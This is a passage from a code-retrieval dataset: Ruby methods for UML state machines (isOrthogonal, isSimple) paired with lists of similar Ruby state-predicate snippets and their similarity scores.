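  # Double negation coerces the submachine reference (or nil) to a strict boolean.
  def isComposite
    !!@submachine
  end
end

simple = UmlState.new
composite = UmlState.new(simple)

simple.isComposite    # => false (no contained region)
composite.isComposite # => true  (contains at least one region)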
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def composite?\n false\n end",
"def composite?\n false\n end",
"def composite?; @composite; end",
"def composite?\n !shapes.empty?\n end",
"def composite?; self[:composite]; end",
"def state\n ret = self[:state] || {}\n if game.facts[:contraband] && game.facts[:contraband].include?(card_type)\n ret[:contraband] = true\n end\n return ret\n end",
"def composite!; self[:composite] = true; self; end",
"def state; region; end",
"def composite?\n relation.is_a?(Relation::Composite)\n end",
"def initialize_state?(object); end",
"def define_state_predicate; end",
"def has_state?\n !@states.empty?\n end",
"def is_state?(name)\n @state.include?(name)\n end",
"def state?(state)\n @state == state\n end",
"def final_state?\n current_state == final_state\n end",
"def state?(state)\n @_state == state\n end",
"def has_state?\n !!current_state\n end",
"def stateful?\n true\n end",
"def state_active?(state)\n @states[state][1]\n end",
"def manifestable_state?\n return true unless manages_state?\n workflow_class.manifest_states.include? Array.wrap(state).first.underscore\n end",
"def state?\n usa?\n end",
"def is_primary?\n !is_regional?\n end",
"def add_state(state, value = false)\n @states[state] = [\n factory.composite_state(self.class.name, state),\n value\n ]\n\n classify_state @states[state]\n end",
"def final?\n @finals.include? @state\n end",
"def active?\n @state.active?\n end",
"def new?\n @_state.nil?\n end",
"def ark_mintable_state?\n return false unless manages_state?\n workflow_class.ark_mint_states.include? Array.wrap(state).first&.underscore\n end",
"def isSubmachineState\n ! ! @submachine\n end",
"def state?(state)\n @states.key?(state)\n end",
"def advanced_state?\n @advanced_state.present?\n end",
"def public_readable_state?\n return true unless manages_state?\n workflow_class.public_read_states.include? Array.wrap(state).first.underscore\n end",
"def closed?\n state_name == \"closed\"\n end",
"def active?\n\t\t\tstate == 'active'\n\t\tend",
"def initialized?\n defined?(@state) && @state\n end",
"def primaryChange\n\t\treturn false if @frozen\n\t\tcase @state\n\t\twhen :white\n\t\t\t@state = :black\n\t\twhen :black\n\t\t\t@state = :white\n\t\tend\n\t\treturn true\n\tend",
"def state?(type, name)\n @state.key?(make_key(type, name))\n end",
"def get_state\n return self.state == 't' || self.state == true\n end",
"def in_progress?\n transitive_states.include? status\n end",
"def noncirculating?\n @type['id'] == '2e48e713-17f3-4c13-a9f8-23845bb210a4' ||\n on_reserve? ||\n @location['name'].include?('Non-Circulating')\n end",
"def full?\n !@state.include?(nil)\n end",
"def full_aux?\n @coil_state_normal ? !@aux_state.all? : @aux_state.all?\n end",
"def cluster_enabled_state\n super\n end",
"def draw_checkbox(rect, state)\n r1 = MACL::Surface::Tool.squarify(rect)\n r2 = r1.contract(anchor: 5, amount: 1)\n draw_dark_rect(r1)\n draw_light_rect(r2) if state\n return rect\n end",
"def closed?\n self.state == 'CLOSED'\n end",
"def state?(name)\n @states.include?(name.to_sym)\n end",
"def construction_in_progress?\n !!@node[\"building_construction\"]\n end",
"def operational?\n state == 'operational'\n end",
"def committed?\n @state == :committed\n end",
"def known_states; end",
"def known_states; end",
"def known_states; end",
"def creating?(creating_state=CREATING)\n state == creating_state\n end",
"def has_state?(v)\n @state[v]\n end",
"def has_state?(v)\n @state[v]\n end",
"def creating?\n state == :CREATING\n end",
"def creating?\n state == :CREATING\n end",
"def creating?\n state == :CREATING\n end",
"def creating?\n state == :CREATING\n end",
"def creating?\n state == :CREATING\n end",
"def secondaryChange\n\t\treturn false if @frozen\n\t\tcase @state\n\t\twhen :white\n\t\t\t@state = :cross\n\t\twhen :cross\n\t\t\t@state = :white\n\t\tend\n\t\treturn true\n\tend",
"def operable?\n initialize_description!\n return false if !reachable? || description.hidden?\n description.primary? || description.secondary?\n end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def states; end",
"def collins_check_can_be_altered?\n collins_osc_state['current_state'] == \"can_be_altered\"\n end",
"def is_active?\n metadata[:inactive].nil? or !metadata[:inactive]\n end",
"def solid?\n @solid\n end",
"def state_group\n state = @current_policy ? @current_policy.tax_state_abbr : @company_info.hq_state\n case state\n when nil\n 'All'\n when 'CA'\n 'California'\n else\n 'non_California'\n end\n end",
"def default_state_class?()\n \"SampleTransferPallet\"\n end",
"def final_state?(curr_state = nil, **)\n next_state(curr_state).blank?\n end",
"def accept_state_of(closure)\r\n closure.each do |set|\r\n if @accept_states.include?(set)\r\n return @accept_states[set] # change this to \"true\" if reverting to crappy system\r\n end\r\n end\r\n return false\r\n end",
"def finalized?\n self.state != STATE_NEW\n end",
"def invisible_testSuccess(c, ci, cv, state)\n @state[COMMITMENT].any? {|terms| terms.size == 4 and terms[0] == c and terms[1] == ci}\nend",
"def has_state?(v)\n@state[v]\nend",
"def get_composite()\n return nil\n end",
"def has_state(name)\n !@_possible_states[name].nil?\n end",
"def needs_surrogate(composite)\n return false if composite_is_reference(composite)\n\n # REVISIT: The following is debatable. If the natural primary key is an ok surrogate, should we inject another?\n return true if @non_reference_composites.include?(composite)\n\n super\n end",
"def workflow_state\n return false unless @curation_concern.respond_to? :workflow_state\n @curation_concern.workflow_state\n end",
"def has_bool_state\n params.require(:state)\n if ! params[:state].in? [\"true\", \"false\"]\n head :bad_request\n end\n params[:state] = ActiveModel::Type::Boolean.new.cast(params[:state])\n end",
"def accept_state?(state)\n @accept.include? state\n end",
"def from_states; end",
"def from_states; end",
"def is_consumable?\n true\n end",
"def canadian?\n\t\t\tprovince = [\"AB\",\"BC\",\"MB\",\"NB\",\"NF\",\"NT\",\"NS\",\"NU\",\"ON\",\"PE\",\"QC\",\"SK\",\"YT\"]\n\t\t\tprovince.include?(state)\n\t\tend",
"def state\n end",
"def is_full\n count(@state.flatten, '-') == 0\n end",
"def enabled_state\n super\n end",
"def enabled_state\n super\n end",
"def enabled_state\n super\n end",
"def enabled_state\n super\n end",
"def enabled_state\n super\n end",
"def enabled_state\n super\n end",
"def leaves?\n false\n end",
"def start_state?\n @state_type == :start\n end"
] |
[
"0.67147475",
"0.67147475",
"0.62915754",
"0.6103282",
"0.6048136",
"0.5974599",
"0.5719796",
"0.55728376",
"0.55474865",
"0.5543379",
"0.54801726",
"0.5466995",
"0.54630053",
"0.54566044",
"0.5449095",
"0.5436063",
"0.54248947",
"0.5377968",
"0.5341084",
"0.53360635",
"0.5328885",
"0.5258216",
"0.5248537",
"0.5245452",
"0.52329874",
"0.5224541",
"0.52124774",
"0.5187074",
"0.51724035",
"0.5165759",
"0.51655173",
"0.5128156",
"0.5121283",
"0.51048046",
"0.50929296",
"0.508698",
"0.50832987",
"0.50541174",
"0.50534654",
"0.5044446",
"0.5039042",
"0.5031975",
"0.50274706",
"0.5027223",
"0.5003451",
"0.49927452",
"0.49764347",
"0.49732563",
"0.497032",
"0.497032",
"0.497032",
"0.49605694",
"0.49589717",
"0.49589717",
"0.4953333",
"0.4953333",
"0.4953333",
"0.4953333",
"0.4953333",
"0.49455908",
"0.49403238",
"0.493942",
"0.493942",
"0.493942",
"0.493942",
"0.493942",
"0.493942",
"0.493942",
"0.493942",
"0.49381533",
"0.49350247",
"0.49330944",
"0.4929072",
"0.49199873",
"0.49199045",
"0.49081147",
"0.49014834",
"0.4877547",
"0.4873927",
"0.48696572",
"0.48598284",
"0.4857682",
"0.48548287",
"0.48531747",
"0.48509404",
"0.48415232",
"0.48413837",
"0.48413837",
"0.4830249",
"0.48286504",
"0.48267525",
"0.48207566",
"0.4809935",
"0.4809935",
"0.4809935",
"0.4809935",
"0.4809935",
"0.4809935",
"0.48091948",
"0.48081928"
] |
0.65872866
|
2
|
A state with isOrthogonal=true is said to be an orthogonal composite state. An orthogonal composite state contains two or more regions. Default value is false.
|
def isOrthogonal
  # Orthogonal (multi-region) states are not modeled by this implementation.
  raise Error::NotImplemented, :message => :isOrthogonal, :object => self
end
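If regions were modeled explicitly, the predicate would follow directly from the UML rule (two or more regions). A hedged sketch reusing the same hypothetical @regions collection as above:

class SketchState
  def initialize(regions = [])
    @regions = regions
  end

  # Orthogonal per UML: the state owns two or more regions.
  def isOrthogonal
    @regions.size >= 2
  end
end

SketchState.new([:a]).isOrthogonal     # => false
SketchState.new([:a, :b]).isOrthogonal # => true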
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def orthogonal?\n @colt_property.isOrthogonal(@colt_matrix)\n end",
"def composite?\n false\n end",
"def composite?\n false\n end",
"def composite?\n !shapes.empty?\n end",
"def fOOrth\r\n end",
"def fOOrth\r\n end",
"def Matrix3dIsOrthogonal(arg0)\n ret = _invoke(1610743911, [arg0], [VT_BYREF | VT_DISPATCH])\n @lastargs = WIN32OLE::ARGV\n ret\n end",
"def orthogonal_with?(a); self.dot(a) == 0; end",
"def interlace_mode?\n @cr[0][7] == 1\n end",
"def shape2d?(o)\n o.range2d? or o.union2d?\nend",
"def shape2d?(o)\n o.range2d? or o.union2d?\nend",
"def atomic?\n puts \"composition is #{self}\" if SY::DEBUG\n puts \"first[0].dimension is #{first[0].dimension}\" if SY::DEBUG\n singular? && first[0].dimension.base?\n end",
"def oblique?\n !right?\n end",
"def orthogonal?(other)\n dot(other) == 0\n end",
"def interlaced?\n !image_ptr[:interlace].zero?\n end",
"def upper_triangular?\n @colt_property.isUpperTriangular(@colt_matrix)\n end",
"def isComposite\n ! ! @submachine\n end",
"def union_shape?(o)\n o.union1d? or o.union2d?\nend",
"def state; region; end",
"def is_connected_east?\r\n return true if @connected_directions.include?(:east)\r\n return false\r\n end",
"def interlaced?\n @interlaced\n end",
"def north\n @state.north(self)\n end",
"def full_aux?\n @coil_state_normal ? !@aux_state.all? : @aux_state.all?\n end",
"def composite?; @composite; end",
"def shape1d?(o)\n o.union1d? or range1d?(o)\nend",
"def prim_shape?(o)\n range1d?(o) or o.range2d?\nend",
"def advanced_state?\n @advanced_state.present?\n end",
"def restriction_commutative?\n ! (partition_left_tautology? && partition_right_tautology?)\n end",
"def shape2d?(x)\n x.range2d? || x.union2d?\nend",
"def unionshape?(x)\n x.union1d? || x.union2d?\nend",
"def initialize_state?(object); end",
"def strictly_upper_triangular?\n @colt_property.isStrictlyUpperTriangular(@colt_matrix)\n end",
"def h?\n @side == :right || @side == :left\n end",
"def compshape?(x)\n unionshape?(x)\nend",
"def is_primary?\n !is_regional?\n end",
"def shape?(o)\n prim_shape?(o) or comp_shape?(o)\nend",
"def set_continuous_collision_state(state)\n state = state ? true : false\n Sketchup.active_model.set_attribute('MSPhysics', 'Continuous Collision Mode', state)\n sim = MSPhysics::Simulation.instance\n sim.set_continuous_collision_state(state) if sim\n return state\n end",
"def clockwise?\n rh_cell.filled? && !lh_cell.filled?\n end",
"def is_plane\n\t\t@angle == 0 || @angle == 180\n\tend",
"def full?\n !@state.include?(nil)\n end",
"def octagonal?\n fcache[:octagonal] ||= (Math.sqrt(3*self +1)+1)% 3 == 0\n end",
"def upper_bidiagonal?\n @colt_property.isUpperBidiagonal(@colt_matrix)\n end",
"def authenticated?()\n\n odd_degree_count = 0;\n\n for i in 0..@number_of_vertices-1 do\n if @adjacent_list[i].length != @indegree[i]\n odd_degree_count += 1\n end\n end\n\n return false if(odd_degree_count!= 0 && odd_degree_count!= 2)\n\n (odd_degree_count == 0 && self.is_eulerian_circuit?) || (odd_degree_count ==2 && self.is_eulerian_path?)\n end",
"def is_full\n count(@state.flatten, '-') == 0\n end",
"def draw_checkbox(rect, state)\n r1 = MACL::Surface::Tool.squarify(rect)\n r2 = r1.contract(anchor: 5, amount: 1)\n draw_dark_rect(r1)\n draw_light_rect(r2) if state\n return rect\n end",
"def define_state_predicate; end",
"def composite?; self[:composite]; end",
"def is_connected_south?\r\n return true if @connected_directions.include?(:south)\r\n return false\r\n end",
"def composite?\n relation.is_a?(Relation::Composite)\n end",
"def final_state?\n current_state == final_state\n end",
"def identity?\n @colt_property.isIdentity(@colt_matrix)\n end",
"def collision_wireframe_visible=(state)\n @debug_collision = state ? true : false\n sim = MSPhysics::Simulation.instance\n sim.collision_wireframe_visible = @debug_collision if sim\n end",
"def triangular?\n @colt_property.isTriangular(@colt_matrix)\n end",
"def final?\n @finals.include? @state\n end",
"def operational?\n state == 'operational'\n end",
"def notional?\n (notional)\n end",
"def test_nad83_state_plane()\n srs = Gdal::Osr::SpatialReference.new()\n srs.set_state_plane(403, 1) # California III NAD83.\n\n parm_list = [\n [Gdal::Osr::SRS_PP_STANDARD_PARALLEL_1, 38.43333333333333],\n [Gdal::Osr::SRS_PP_STANDARD_PARALLEL_2, 37.06666666666667],\n [Gdal::Osr::SRS_PP_LATITUDE_OF_ORIGIN, 36.5],\n [Gdal::Osr::SRS_PP_CENTRAL_MERIDIAN, -120.5],\n [Gdal::Osr::SRS_PP_FALSE_EASTING, 2000000.0],\n [Gdal::Osr::SRS_PP_FALSE_NORTHING, 500000.0]\n ]\n\n parm_list.each() do |parm|\n value = srs.get_proj_parm(parm[0], -1111)\n assert_in_delta(parm[1], value, 0.0000001)\n end\n\n auth_list = [ ['GEOGCS', '4269'],\n ['DATUM', '6269'],\n ['PROJCS', '26943'],\n ['PROJCS|UNIT', '9001']\n ]\n\n auth_list.each() do |auth|\n assert_equal(srs.get_authority_name(auth[0]), 'EPSG')\n assert_equal(srs.get_authority_code(auth[0]), auth[1])\n end\n end",
"def lower_triangular?\n @colt_property.isLowerTriangular(@colt_matrix)\n end",
"def geostationary_orbit\n return Orbit.geostationary_orbit(self)\n end",
"def chomsky_normal_form?\n all? { |r| r.chomsky_normal_form? } \n end",
"def obstructed?(new_x, new_y); end",
"def solid?\n @solid\n end",
"def landscape?\n xy_ratio >= 1\n end",
"def equilateral?\n sides.uniq.size.eql?(1)\n end",
"def full?\n par? && trio?\n end",
"def initialized?\n defined?(@state) && @state\n end",
"def state_active?(state)\n @states[state][1]\n end",
"def aabb_visible=(state)\n @debug_aabb = state ? true : false\n sim = MSPhysics::Simulation.instance\n sim.aabb_visible = @debug_aabb if sim\n end",
"def unit_triangular?\n @colt_property.isUnitTriangular(@colt_matrix)\n end",
"def operable?\n initialize_description!\n return false if !reachable? || description.hidden?\n description.primary? || description.secondary?\n end",
"def is_on_floor_bottom\n return Sketchup.active_model.get_attribute(\"GeoReference\", \"onOceanFloor\") == \"true\";\nend",
"def tridiagonal?\n @colt_property.isTridiagonal(@colt_matrix)\n end",
"def squaragonal?(grid)\n diagnoal?(grid) || diagnoal?(grid.reverse)\nend",
"def strictly_triangular?\n @colt_property.isStrictlyTriangular(@colt_matrix)\n end",
"def challenge_open?(division)\n get_state(division).eql? 'open'\n end",
"def orientation\n p1, p2, p3 = *convex_sub_polygon\n det = (p2[0]-p1[0])*(p3[1]-p1[1]) - (p3[0]-p1[0])*(p2[1]-p1[1])\n @orientation ||= (det < 0)? 1 : -1\n end",
"def atlas_visible?\n return quality_checked? && open_access? && geom?\n end",
"def is_solution?(bucket_state)\n return bucket_state == @instance.final_capacities\n end",
"def has_state?\n !@states.empty?\n end",
"def same_land?(other)\n land == other.land\n end",
"def primshape?(x)\n x.range1d? || x.range2d?\nend",
"def is_closed?\n return @polygon_points.first == @polygon_points.last\n end",
"def is_closed?\n return @polygon_points.first == @polygon_points.last\n end",
"def axes_visible=(state)\n @debug_axes = state ? true : false\n sim = MSPhysics::Simulation.instance\n sim.axes_visible = @debug_axes if sim\n end",
"def state\n case [@c2, @c1, @c0]\n when [0,0,0] then \"Z -> Z\"\n when [0,0,1] then \"X + Y\"\n when [0,1,0] then \"rotate x\"\n when [0,1,1] then \"x & y\"\n when [1,0,0] then \"x | y\"\n when [1,0,1] then \"x ^ y\"\n when [1,1,0] then \"~ x\"\n when [1,1,1] then \"x == y\"\n else raise RuntimeError.new \"wrong alu operation: #{ [@c2, @c1, @c0] }\"\n end\n end",
"def or(state)\n OrStatement.new(self, state)\n end",
"def clockwise(a, b, c)\n oriented_area(a, b, c).negative?\n end",
"def state?(state)\n @state == state\n end",
"def ballpark_transformation?\r\n result = Api.proj_coordoperation_has_ballpark_transformation(Context.current, self)\r\n result == 1 ? true : false\r\n end",
"def is_upper_triangular?\n triangular(self.row_vectors)\n end",
"def finalized?\n @layers.none?\n end",
"def lower_bidiagonal?\n @colt_property.isLowerBidiagonal(@colt_matrix)\n end",
"def at_rightmost_side?\n\t\tcl[1] == @map.nr_columns\n\tend",
"def county_and_country_coordinators?\n (merge_roles & COUNTY_COUNTRY_COORDINATORS).empty?\n end",
"def equilateral?\n type == :equilateral\n end",
"def washington_state_resident?\n resident == 1 || resident == 2\n end",
"def composite!; self[:composite] = true; self; end",
"def state?\n usa?\n end",
"def mobocratical_corrivalship?()\n apometaboly_peaklike(oversourly)\n end",
"def sogr?\n (sogr)\n end"
] |
[
"0.6146887",
"0.52151644",
"0.52151644",
"0.51851517",
"0.51488584",
"0.51488584",
"0.51258343",
"0.5104288",
"0.5079847",
"0.5079044",
"0.5079044",
"0.50709265",
"0.50416905",
"0.50009125",
"0.49915877",
"0.49877498",
"0.49842927",
"0.49645686",
"0.49493575",
"0.48900872",
"0.48831347",
"0.48710206",
"0.48655987",
"0.48110998",
"0.47949833",
"0.47845235",
"0.47727215",
"0.4743478",
"0.47371417",
"0.47320604",
"0.47219333",
"0.47182527",
"0.46999297",
"0.46974558",
"0.4679195",
"0.4650204",
"0.46196824",
"0.46098563",
"0.46049488",
"0.4592325",
"0.45850152",
"0.4574279",
"0.4565682",
"0.45645848",
"0.45614892",
"0.45570797",
"0.45528388",
"0.4547303",
"0.45359585",
"0.453261",
"0.45281053",
"0.4527189",
"0.45259777",
"0.45239764",
"0.4519789",
"0.45185643",
"0.44995156",
"0.44988847",
"0.44986695",
"0.44979057",
"0.4496452",
"0.44915545",
"0.44740015",
"0.4473668",
"0.44713262",
"0.44681504",
"0.44627038",
"0.44591168",
"0.4454834",
"0.44483522",
"0.44431826",
"0.44418058",
"0.44288856",
"0.4427853",
"0.44186938",
"0.4415485",
"0.4414596",
"0.44128916",
"0.44090828",
"0.44013208",
"0.43971282",
"0.43940997",
"0.43940997",
"0.4390161",
"0.4385799",
"0.43810198",
"0.43779874",
"0.4376094",
"0.4375505",
"0.43748602",
"0.43747255",
"0.43725753",
"0.43658754",
"0.4349302",
"0.43441123",
"0.43438712",
"0.43337253",
"0.43304121",
"0.43273103",
"0.4325254"
] |
0.66913474
|
0
|
A state with isSimple=true is said to be a simple state. A simple state does not have any regions and it does not refer to any submachine state machine. Default value is true.
|
def isSimple
  # Not implemented here; the sketch below shows the UML rule.
  raise Error::NotImplemented, :message => :isSimple, :object => self
end
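A hedged sketch of the rule the raise stands in for: a simple state has no regions and refers to no submachine. SketchState and its fields are assumptions, not the library's API.

class SketchState
  def initialize(regions: [], submachine: nil)
    @regions = regions
    @submachine = submachine
  end

  # Simple per UML: no regions and no referenced submachine.
  def isSimple
    @regions.empty? && @submachine.nil?
  end
end

SketchState.new.isSimple                   # => true
SketchState.new(submachine: :sub).isSimple # => false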
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def start_state?\n @state_type == :start\n end",
"def get_state\n return self.state == 't' || self.state == true\n end",
"def simple?\n true\n end",
"def stateful?\n true\n end",
"def state?\n usa?\n end",
"def boolean!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 16 )\n\n\n\n type = BOOLEAN\n channel = ANTLR3::DEFAULT_CHANNEL\n # - - - - label initialization - - - -\n\n\n # - - - - main rule block - - - -\n # at line 37:10: 'estado'\n match( \"estado\" )\n\n\n\n @state.type = type\n @state.channel = channel\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 16 )\n\n\n end",
"def define_state_predicate; end",
"def state\n end",
"def is_state?(name)\n @state.include?(name)\n end",
"def state\n self[:ST]\n end",
"def state?(type, name)\n @state.key?(make_key(type, name))\n end",
"def desired_state?\n return true unless options.key?(:desired_state)\n\n options[:desired_state]\n end",
"def test_state_names_2\n simple_dfa = Automaton.new(false) do |fa|\n fa.add_state(:initial => true)\n end\n assert_raise ArgumentError do\n simple_dfa.get_state('') # non-existing state\n end\n end",
"def running?; state == 'running'; end",
"def running?; state == 'running'; end",
"def name\n state_name\n end",
"def has_state?\n !@states.empty?\n end",
"def on?\n state[\"on\"]\n end",
"def state\n object.human_state_name\n end",
"def state?(name)\n @states.include?(name.to_sym)\n end",
"def ark_mintable_state?\n return false unless manages_state?\n workflow_class.ark_mint_states.include? Array.wrap(state).first&.underscore\n end",
"def default_state_class?()\n \"SampleTransferPallet\"\n end",
"def default_state_class?()\n return nil\n end",
"def type_bool!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 37 )\n\n\n\n type = TYPE_BOOL\n channel = ANTLR3::DEFAULT_CHANNEL\n # - - - - label initialization - - - -\n\n\n # - - - - main rule block - - - -\n # at line 213:12: 'bool'\n match( \"bool\" )\n\n\n\n @state.type = type\n @state.channel = channel\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 37 )\n\n\n end",
"def initial?\n Machine[@target_class].initial_state_name == self.name\n end",
"def initialize_state?(object); end",
"def has_state?\n !!current_state\n end",
"def state_active?(state)\n @states[state][1]\n end",
"def state\n status.state name\n end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def test_add_state\n Automaton.new(false) do |fa|\n s0 = fa.add_state\n assert_equal(1, fa.state_count)\n assert_equal(false, s0.initial?)\n assert_equal(false, s0.accepting?)\n\n s1 = fa.add_state(:initial => true)\n assert_equal(2, fa.state_count)\n assert_equal(true, s1.initial?)\n assert_equal(false, s1.accepting?)\n\n s2 = fa.add_state(:initial => true, :accepting => true)\n assert_equal(3, fa.state_count)\n assert_equal(true, s2.initial?)\n assert_equal(true, s2.accepting?)\n\n s3 = fa.add_state(:myownkey => \"blambeau\")\n assert_equal(4, fa.state_count)\n assert_equal(false, s3.initial?)\n assert_equal(false, s3.accepting?)\n assert_equal(\"blambeau\", s3[:myownkey])\n\n assert_equal(0, fa.edge_count)\n end\n end",
"def state?(state)\n @states.key?(state)\n end",
"def state?(state)\n @_state == state\n end",
"def state?(state)\n @state == state\n end",
"def true!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 16 )\n\n type = TRUE\n channel = ANTLR3::DEFAULT_CHANNEL\n\n \n # - - - - main rule block - - - -\n # at line 318:8: 'true'\n match( \"true\" )\n\n \n @state.type = type\n @state.channel = channel\n\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 16 )\n\n end",
"def true!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 57 )\n\n type = TRUE\n channel = ANTLR3::DEFAULT_CHANNEL\n\n \n # - - - - main rule block - - - -\n # at line 178:8: 'true'\n match( \"true\" )\n\n \n @state.type = type\n @state.channel = channel\n\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 57 )\n\n end",
"def state name, options={}, &block\n valid_unless_nested()\n define_state( name, options, &block )\n end",
"def active?\n\t\t\tstate == 'active'\n\t\tend",
"def state_name\n self.state.name if self.state.name?\n end",
"def boolean!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 28 )\n\n\n\n type = BOOLEAN\n channel = ANTLR3::DEFAULT_CHANNEL\n # - - - - label initialization - - - -\n\n\n # - - - - main rule block - - - -\n # at line 193:8: ( 'true' | 'false' )\n alt_2 = 2\n look_2_0 = @input.peek( 1 )\n\n if ( look_2_0 == 0x74 )\n alt_2 = 1\n elsif ( look_2_0 == 0x66 )\n alt_2 = 2\n else\n raise NoViableAlternative( \"\", 2, 0 )\n\n end\n case alt_2\n when 1\n # at line 193:10: 'true'\n match( \"true\" )\n\n\n when 2\n # at line 193:19: 'false'\n match( \"false\" )\n\n\n end\n\n @state.type = type\n @state.channel = channel\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 28 )\n\n\n end",
"def states; end",
"def active?\n @state.active?\n end",
"def public_readable_state?\n return true unless manages_state?\n workflow_class.public_read_states.include? Array.wrap(state).first.underscore\n end",
"def toggle_state\n state\n end",
"def request_state(s, *flags) # :args: state, *flags\n return true if @_hegemon_state==s\n return false unless @_hegemon_states[@_hegemon_state].transitions[s]\n @_hegemon_states[@_hegemon_state].transitions[s].try(*flags)\n end",
"def has_state?(v)\n @state[v]\n end",
"def has_state?(v)\n @state[v]\n end",
"def new?\n @_state.nil?\n end",
"def state=(s)\n @state = s\n end",
"def waitingsecond?\n state_name == \"waitingsecond\"\n end",
"def state\n @state\n end",
"def known_states; end",
"def known_states; end",
"def known_states; end",
"def running?\n @state == :running\n end",
"def define_state_method(state)\n return if machine.respond_to?(\"#{state}?\")\n machine.send(:define_singleton_method, \"#{state}?\") do\n machine.is?(state.to_sym)\n end\n end",
"def isSubmachineState\n ! ! @submachine\n end",
"def state\n self.well_info.state\n end",
"def state(name, &block)\n raise ArgumentError, \"The state name must respond to `to_sym`\" unless name.respond_to?(:to_sym)\n name = name.to_sym\n state_configuration(name).instance_eval &block\n \n raise \"You must provide a start state for #{name}\" unless state_configuration(name).start_state\n\n define_method(name) { state_container name }\n end",
"def state=(value)\n @state = value\n end",
"def state\n @state\n end",
"def test_state_names_1\n s0,s1,s2 = nil,nil,nil\n simple_dfa = Automaton.new(false) do |fa|\n s0 = fa.add_state(:initial => true, :name => 'A')\n s1 = fa.add_state(:accepting => true, :name => 'B')\n s2 = fa.add_state(:name => 'C')\n fa.connect(s0, s1, 'a')\n fa.connect(s1, s1, 'b')\n fa.connect(s1, s2, 'c')\n end\n assert_raise ArgumentError do\n simple_dfa.get_state(56) # wrong type\n end\n assert_raise ArgumentError do\n simple_dfa.get_state('T') # non-existing name\n end\n\n assert_raise ArgumentError do\n simple_dfa.get_state('') # non-existing state\n end\n\n assert_raise ArgumentError do\n simple_dfa.get_state(nil) # nil name\n end\n assert_equal s0,simple_dfa.get_state('A')\n assert_equal s1,simple_dfa.get_state('B')\n assert_equal s2,simple_dfa.get_state('C')\n end",
"def advanced_state?\n @advanced_state.present?\n end",
"def has_state?(v)\n@state[v]\nend",
"def stp_enabled_state\n super\n end",
"def has_bool_state\n params.require(:state)\n if ! params[:state].in? [\"true\", \"false\"]\n head :bad_request\n end\n params[:state] = ActiveModel::Type::Boolean.new.cast(params[:state])\n end",
"def perform_initial_transition?\n !current_state\n end",
"def aasm_read_state(_name = :default)\n state.try(:to_sym).presence || self.class.aasm.initial_state\n end",
"def toggle_state\n puts \"******* toggle_state *******\"\n end",
"def state\n @state\n end",
"def state \n :empty\n end",
"def state\n @state.blank? ? nil : @state\n end",
"def define_state_predicate\n name = self.name\n \n # Still use class_eval here instance of define_instance_method since\n # we need to be able to call +super+\n @instance_helper_module.class_eval do\n define_method(\"#{name}?\") do |*args|\n args.empty? ? super(*args) : self.class.state_machine(name).states.matches?(self, *args)\n end\n end\n end",
"def basic?\n false\n end",
"def is_state_machine(options = {}, &block)\n extend DataMapper::Is::StateMachine::EventDsl\n extend DataMapper::Is::StateMachine::StateDsl\n include DataMapper::Is::StateMachine::InstanceMethods\n\n # ===== Setup context =====\n options = { :column => :state, :initial => nil }.merge(options)\n column = options[:column]\n initial = options[:initial].to_s\n unless properties.detect { |p| p.name == column }\n property column, String, :default => initial\n end\n machine = Data::Machine.new(column, initial)\n @is_state_machine = { :machine => machine }\n\n # ===== Define callbacks =====\n # TODO: define callbacks\n # before :save do\n # if self.new_record?\n # # ...\n # else\n # # ...\n # end\n # end\n\n before :destroy do\n # Do we need to do anything here?\n end\n\n # ===== Setup context =====\n push_state_machine_context(:is)\n\n yield if block_given?\n\n # ===== Teardown context =====\n pop_state_machine_context\n end",
"def enabled_state\n super\n end",
"def enabled_state\n super\n end",
"def enabled_state\n super\n end",
"def enabled_state\n super\n end",
"def enabled_state\n super\n end",
"def enabled_state\n super\n end",
"def state_label\n self.state == 3 ? \"Confirmado\" : \"Borrador\"\n end",
"def note_state\n state if note\n end",
"def closed?\n state_name == \"closed\"\n end",
"def current_state?(state) \n\t return state == current_state.to_sym\n\tend",
"def state_name\n self.state.name if self.state\n end",
"def approved?\n state == 'approved'\n end",
"def primaryChange\n\t\treturn false if @frozen\n\t\tcase @state\n\t\twhen :white\n\t\t\t@state = :black\n\t\twhen :black\n\t\t\t@state = :white\n\t\tend\n\t\treturn true\n\tend",
"def state\n states.first\n end",
"def active?; status == :active; end",
"def state=(s)\n raise ArgumentError, 'The state of TurnOnTasks is always \\'ON\\'' unless s.casecmp('ON').zero?\n super\n end",
"def define_state_accessor; end",
"def state()\n info[:state]\n end"
] |
[
"0.6418176",
"0.62676144",
"0.6224467",
"0.6139125",
"0.6101698",
"0.60610384",
"0.60348487",
"0.5992234",
"0.5944982",
"0.5880808",
"0.58668256",
"0.58348817",
"0.58233947",
"0.5819948",
"0.5819948",
"0.5806888",
"0.57899964",
"0.57864094",
"0.57849985",
"0.5783942",
"0.5772183",
"0.5758649",
"0.57393026",
"0.572332",
"0.57224655",
"0.57183945",
"0.5708913",
"0.5706177",
"0.57026404",
"0.56960666",
"0.56960666",
"0.56960666",
"0.56960666",
"0.56960666",
"0.56960666",
"0.56960666",
"0.56960666",
"0.5682679",
"0.5677965",
"0.56770664",
"0.56723285",
"0.56528324",
"0.56473684",
"0.56387556",
"0.5637",
"0.5623821",
"0.5591193",
"0.5571721",
"0.55595",
"0.5557771",
"0.5543404",
"0.5524098",
"0.5521059",
"0.5521059",
"0.5519862",
"0.5512347",
"0.55036527",
"0.5491916",
"0.54885864",
"0.54885864",
"0.54885864",
"0.54794574",
"0.5472118",
"0.5471171",
